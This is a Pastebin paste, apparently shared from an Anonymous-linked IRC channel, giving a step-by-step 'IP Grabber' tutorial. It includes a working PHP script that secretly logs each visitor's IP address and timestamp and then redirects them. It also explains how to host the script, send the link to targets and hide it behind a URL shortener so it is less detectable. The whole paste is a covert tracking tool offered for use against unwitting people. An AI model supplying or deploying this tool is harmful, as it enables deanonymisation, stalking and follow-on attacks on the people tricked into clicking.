Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Ip Grabber
- irc.anonops.li #pirates
- Create a php file. Name it to ip.php
- paste this code in the php file
- <?php
- $ip = $_SERVER['REMOTE_ADDR'];
- $dt = date("l dS \of F Y h:i:s A");
- $file=fopen("ip_log.txt","a");
- $data = $ip.' '.$dt."\n";
- fwrite($file, $data);
- fclose($file);
- header( 'Location: http://redirects.user.to' ) ;
- ?>
- then Save
- Create a text file and name it to ip_log.txt
- Then create a account with my3gb.com or with
- any other web hosting site
- After that upload the php file (ip.php) and
- text file you created (ip_log.txt)
- then sent out the link.
- for Example
- Http://yoursite.com/ip.php or use
- a url shorter to make less detectable
- to check your ip which visited the
- link use the file manager provided
- by your site open (ip_log.txt) or
- ftp to your site and download it..
- Done
- Dont (http://goo.gl/1lFwt) go there.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement